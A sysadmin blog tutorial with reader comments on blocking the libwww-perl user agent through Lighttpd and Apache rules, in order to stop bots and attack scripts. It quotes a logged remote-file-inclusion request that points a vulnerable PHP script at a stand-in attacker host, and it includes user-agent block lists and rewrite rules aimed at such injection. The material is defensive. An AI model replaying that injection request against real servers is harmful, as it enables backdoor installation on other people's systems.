The rise of bots, spammers, crack attacks and libwww-perl

libwww-perl (LWP) is fine WWW client/server library for Perl. Unfortunately this library used by many script kiddy, crackers, and spam bots.

ADVERTISEMENTS

Verify bots…

Following is a typical example, you will find in your apache or lighttpd access.log log file:

$ grep ‘libwww-perl’ access.log

OR

$ grep ‘libwww-perl’ /var/log/lighttpd/access.log

Output:

62.152.64.210 www.domain.com - [23/Oct/2006:22:24:37 +0000] "GET /wamp_dir/setup/yesno.phtml?no_url=http://www.someattackersite.com/list.txt? HTTP/1.1" 200 72672 "-" "libwww-perl/5.76"

So someone is trying to attack your host and exploit security by installing a backdoor. yesno.phtml is poorly written application and it can run or include php code (list.txt) from remote server. This code install perl based backdoor in /tmp or /dev/shm and send notification to IRC server or bot master i.e. server is ready for attack against other computer. This back door can flood or DDoS other victims server (it will also cost you tons of bandwidth). Usually attacker will hide himself behind zombie machines. Blocking by user agent can help and in some cases problem can be dropped all together.

You will also notice that libwww-perl/5.76 as browser name (read as useragent). To avoid such attack:
=> Block all libwww-perl useragent
=> Run web server in chrooted jail

How to block libwww-perl under Lighttpd web server?

Open lighttpd.conf file:
# vi /etc/lighttpd/lighttpd.conf
Append following line to main server or virtual hosting section:
$HTTP["useragent"] =~ "libwww-perl" {
url.access-deny = ( "" )
}

Save and close the file. Restart the lighttpd:
# /etc/init.d/lighttpd restart

How to block libwww-perl under Apache web server?

Use mod_rewrite and .htaccess file to block user agent libwww-perl. Open your .htaccess file and add rule as follows:
SetEnvIfNoCase User-Agent "^libwww-perl*" block_bad_bots
Deny from env=block_bad_bots

How do I verify that User-Agent libwww-perl is blocked?

Download this perl script on your own workstation. Replace http://your-website.com/ with your site name:
$req = HTTP::Request->new(GET => 'http://your-website.com/');
Save and execute perl script:
$ chmod +x test-lwp.pl
$ ./test-lwp.pl

Output:

Error: 403 Forbidden

You should see 403 Forbidden error as your user-agent is blocked by server configuration.

Please note that blocking by user agent can help, but spammers spoof user agents. My personal experience shows that blocking libwww-perl saves bandwidth and drops potential threats by 50-80%.

Another highly recommended solution is to run web server in chrooted jail. In chrooted jail attacker cannot install backdoor as shell and utilities such as wget not available to download the perl code. I also recommend blocking all outgoing http/ftp request from your webserver using iptables or use hardware based firewall such as Cisco ASA Firewalls.

Final extreme solution is to put entire root file system on read only media such as CDROM (or use live CD). No attacker can bring down your web server if it is serving pages from read only media (except DoS/DDoS attack).

What do you think? How do you block such attacks? Please share your nifty technique with us.

🐧 Get the latest tutorials on SysAdmin, Linux/Unix, Open Source & DevOps topics via:
CategoryList of Unix and Linux commands
File Managementcat
FirewallCentOS 8 OpenSUSE RHEL 8 Ubuntu 16.04 Ubuntu 18.04 Ubuntu 20.04
Network Utilitiesdig host ip nmap
OpenVPNCentOS 7 CentOS 8 Debian 10 Debian 8/9 Ubuntu 18.04 Ubuntu 20.04
Package Managerapk apt
Processes Managementbg chroot cron disown fg jobs killall kill pidof pstree pwdx time
Searchinggrep whereis which
User Informationgroups id lastcomm last lid/libuser-lid logname members users whoami who w
WireGuard VPNCentOS 8 Debian 10 Firewall Ubuntu 20.04

ADVERTISEMENTS
29 comments… add one
  • Randal L. Schwartz Nov 4, 2006 @ 14:32

    Blocking LWP::UserAgent by agent name is like painting a lock on your door and saying it’s secure. Dumb. Really dumb. Not worth the time, and surprised you suggested it.

    • Jesus of Anonymous Jun 15, 2011 @ 22:39

      Personally, I would have a like fun at the script kiddies seeing as they mostly use automactic scripts they downloaded from irc. Simply redirect your vector attack path that you can see in your logs , (you will know what they are looking for) redirect it over to the FBI. You can bet they will soon be stopping attacking your site for fear of being traced. No one wants the FBI to track and jail them. If they are stupid enough to run an auto attack bot thr it will be the FBi site that gets a hack vector not you, and the FBi will trace your hacker, simple lol.

      • ElSecurityGURU Sep 2, 2011 @ 7:40

        That is funny and prob a good way to stop them lol el kudos

  • 🐧 nixCraft Nov 4, 2006 @ 16:00

    Randal,

    Blocking user agent can help, but spammers spoof user agents. Just suggested solution; there are tons of dumb spammers too they don’t change there user agent so I do block them 🙂

    Real solution is chrooted jail.

    Appreciate your post.

  • DarkMindZ Apr 29, 2008 @ 18:04

    Good one, I wrote a similar easier techique here:

    Blocking bots and scanners with htaccess

  • mumuri May 21, 2008 @ 19:20

    there is an other solution , if this soft read all link in a page, you can just put a non viewable link on the page, and when this link is call, you ban the ip of the bot.

  • Terrorkarotte Mar 4, 2009 @ 10:03

    Thanks for the tutorial. After I made the changes the kids changed their identification and now they can try their attacs like before.
    When i was analysing, what kind of code injection attemp they tried this time i found this page: http://www.crawltrack.net/
    It is a php application with mysql support, that allows me to redirect and block the scriptkiddies when they try to make a injection attemp. The script does not look for useragent instead for injections. Maybe this script is worth a try for you too.

  • Lawrence Apr 9, 2009 @ 18:02

    3 years on since you wrote this, and its still a good suggestion.

    Randall Schwartz might be Mr Perl, but blocking libwww-perl has worked wonders for me in reducing uncessary bandwidth from bots.

    Checking my logs I have zero legitimate user agents using libwww-perl, and *100%* hacker attempts using it (or other user agents). Thats good enough for me to block that agent.

    I’m doing it in apache2.conf as follows:

    SetEnvIfNoCase User-Agent "^Wget" bad_bot
    SetEnvIfNoCase User-Agent "^EmailSiphon" bad_bot
    SetEnvIfNoCase User-Agent "^EmailWolf" bad_bot
    SetEnvIfNoCase User-Agent "^libwww-perl" bad_bot
    
    
        Order allow,deny
        Allow from all
        Deny from env=bad_bot
    
    
  • Bruno Jun 2, 2009 @ 7:16

    Hi.
    I try to use your tutorial today (using .htaccess file) but it doesn’t work.
    Then I try to replace the first line by :
    SetEnvIfNoCase User-Agent "^.*libwww-perl" block_bad_bots
    and it’s now working.
    Hope It can help you to improve this great tip

  • About Web Jul 13, 2011 @ 7:26

    Thanks Vivek , finally got this working solution to block lib www perl bot access.

  • techno Feb 22, 2012 @ 15:00

    thank’s Vivek,this article helpfull for me

  • MetaTrader 4 MQL Services Apr 11, 2012 @ 23:53

    Thank you very much!

    We had quite some bandwidth stolen due to this annoying perl bot.

    Thanks to you we now got it blocked at the htaccess.

    Keep up the good work!

  • Sam May 8, 2012 @ 6:56

    Sometimes its all quite confusing……..especially for newbies………

  • Abhimanyu Jun 12, 2012 @ 11:47

    Hi Website Owner,

    i have a website which has been build in web 2.0 version so please give me any ideas to block spammers via .htaccess or lipwww-perl access. i had already tried your all above coding please help me. right now i m just block the IPs one by one and everyday i have found so many spammers IPs..

    Hope you will consider my request and respond me soon

    Regards
    Abhimanyu

  • Poceni letalske karte Aug 25, 2012 @ 19:02

    Thank you for this useful tip. It has been handy for me.
    Kind regards!

  • poptropica Aug 30, 2012 @ 16:20

    also tried below and place it in you .htaccess fiel.

    RewriteCond %{HTTP_USER_AGENT} libwww [NC,OR]
    RewriteCond %{QUERY_STRING} ^(.*)=http [NC]
    RewriteRule ^(.*)$ – [F,L]

  • Paul Goh Oct 3, 2012 @ 11:56

    how to put the code in the htaccess file?

  • kudos May 1, 2013 @ 10:48

    Thanks for your tutorial. However, it’s not working for me. I inserted the script in my htaccess.
    I then used your perl script and changed the domain to mine. I’m not familiar with perl at all but i’m using Padre editor and i simply just clicked on run script button.
    The server did not block me – instead i got to see the HTML of my website.

    Any ideas?

  • آموزش سئو Nov 9, 2013 @ 4:52

    Thank you for htaccess code

  • Michael Fever Mar 8, 2014 @ 1:35

    The script blocks the user agent string which is sent by the browser. It’s not something you can easily replicate.

  • Steve Rogers Mar 18, 2014 @ 16:03

    Thank you very much for the tips! I saved a lot of bandwidth from these bots. By the way, will this affect my SEO ranking in any way?

  • johnny Jun 16, 2014 @ 18:42

    Can someone explain to me, how to block Libwww-perl, on blogspot.
    when i check my blog.. Libwww-perl is on..

  • Mayyank Gupta Dec 29, 2014 @ 7:07

    Johnny use this code
    RewriteCond %{HTTP_USER_AGENT} libwww-perl.*
    RewriteRule .* – [F,L]

  • Johnny Evans Feb 20, 2015 @ 12:43

    What about blocking it on IIS web servers?

    Thanks

  • Gaurav dutt Mar 29, 2015 @ 17:51

    How to block this libwww-perl.8 in blogger ?

  • آپلود عکس Sep 15, 2015 @ 8:34

    i set this code in .htaccess but not set

  • al3abmizo Jan 20, 2016 @ 21:13

    Thanks for the great info 🙂

  • Yiannis Apr 19, 2017 @ 10:02

    Years back, but still working…Thanks!
    Just be careful when inserting the code. Make the change as suggested at the comments.

    SetEnvIfNoCase User-Agent "^.*libwww-perl" block_bad_bots

  • raja May 13, 2017 @ 1:24

    we have tried all options but nothing works, please can someone help me solve this problem in our asp.net web application?

Leave a Reply

Your email address will not be published. Required fields are marked *

Use HTML <pre>...</pre>, <code>...</code> and <kbd>...</kbd> for code samples.